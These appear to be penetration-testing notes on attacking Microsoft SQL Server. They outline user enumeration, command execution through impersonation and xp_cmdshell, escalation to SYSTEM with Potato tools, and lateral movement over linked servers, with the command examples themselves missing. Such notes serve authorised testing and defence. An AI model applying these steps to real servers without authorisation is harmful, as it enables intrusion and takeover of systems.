MS SQL is a Microsoft relational database solution.
- Default port: 1433
- public role
- PowerUpSQL notes
- SQLRecon notes
Users that do not have the public
role may not directly see who’s also on the SQL Server. To enumerate SQL users using PowerSploit without a role:
Apart from PowerUpSQL and SQLRecon, mssqlclient.py (impacket) can also be used to run SQL statements:
RCE via impersonation
09-lateral-movement03-execution See: PowerUpSQL, SQLRecon Look for users who may impersonate another (alternatively use SQLRecon).
RCE via xp_cmdshell
02-initial-access 03-execution
xp_cmdshell is a MS SQL feature that is disabled by default, as it allows SQL users to run OS commands. It normally requires sysadmin permissions (and executes command under the SQL server account), unless the ##xp_cmdshell_proxy_account##
credential is configured.
PowerUpSQL (sysadmin required; this enables xp_cmdshell then disables after execution):
Enable and use xp_cmdshell:
Privesc via SeImpersonatePrivilege
See: JuicyPotato and SweetPotato #ttp/05-privilege-escalation
SQL Server accounts have the SeImpersonatePrivilege. The use of JuicyPotato (and variants) can force a SYSTEM service into talking with SQL Server (think print spool exploit), which allows an attacker to impersonate SYSTEM.
Lateral Movement via Links
09-lateral-movement02-initial-access “Links” allow an SQL Server to access data from another server instance (does not need to be in domain).
To list links:
To run a query through a link:
xp_cmdshell cannot (normally) be re-enabled
Although xp_cmdshell can be used over a link if already enabled, it cannot be enabled over a link, since sp_configure can only be used if
rpcout
is enabled.
To enable xp_cmdshell when link has rpcout=true
Automatically enumerate links: